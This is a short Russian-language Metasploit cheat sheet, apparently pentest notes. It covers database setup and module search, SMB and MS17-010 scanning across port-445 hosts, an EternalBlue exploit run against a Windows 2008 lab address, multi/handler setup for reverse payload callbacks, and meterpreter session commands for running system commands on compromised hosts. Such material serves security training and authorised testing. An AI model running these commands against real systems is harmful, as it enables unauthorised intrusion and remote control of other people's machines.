Инициализация БД: $ sudo systemctl enable postgresql $ sudo systemctl start postgresql $ sudo msfdb init $ msfconsole -q msf > db_status # проверка подключения

Фишки:

setg - установить параметр глобально

grep notepad sessions -i 1 -C "ps" - посмотреть список процессов

msf6 exploit(multi/handler) > set ExitOnSession false - установить мультисессию на одну полезную нагрузку

msf6 exploit(multi/handler) > exploit -j - запуск мультихендлера в режиме задача

Untitled

Базовый пример эксплуатации уязвимости: msf > use exploit/windows/smb/ms17_010_eternalblue msf > set RHOSTS 10.0.2.X # Windows 2008 server msf > set LHOST eth0 msf > exploit

Пример поисков по модулям: msf > search name:mysql msf > search platform:aix msf > search type:post msf > search cve:2011 author:jduck msf > search -h # полный список опций

Grep в MSF используется для поиска паттернов в выводе команд: msf > grep ms17 search windows

Примеры работы с БД: msf > db_import scan # импорт результатов сканирования Nmap msf > services # список всех сервисов

Сканирование версии SMB для всех хостов с 445 портом: msf > use auxiliary/scanner/smb/smb_version msf > services -p 445 -R # добавить к rhosts msf > set threads 50 msf > set verbose false msf > exploit msf > grep 2008 services -p 445 # все хосты с Windows 2008

Просканируем все хосты с открытым 445 портом на MS17-010: msf > use auxiliary/scanner/smb/smb_ms17_010 msf > set verbose false msf > set check_pipe true msf > services -p 445 -R # установка RHOSTS по правилу msf > vulns # вывод информации об уязвимостях msf > grep MS17-010 vulns # комбинирование вывода с фильтром

Управление сессиями meterpreter: msf > sessions -l # список сессий msf > sessions -i <id> # переключение между сессиями msf > sessions -n sessname -i 1 # задать имя сессии msf > sessions -i 1 -c "tasklist" # запуск системной команды msf > sessions -i 1 -C getuid # запуск команды meterpreter msf > sessions -c “tasklist /v | findstr notepad.exe” all # поиск пользователя с notepad.exe msf > session -K # закрыть все сессии msf > sessions -k # закрыть сессию meterpreter > background # переключение сессии в background

Управление задачами (jobs) и асинхронное получение соединений от полезных нагрузок: msf > use exploit/multi/handler msf > set payload ... msf > set LHOST\\LPORT # наш ip-адрес и порт msf > set exitonsession false msf > run -h msf > run -jz msf > jobs -h

Популярные модули:

Работа с SMB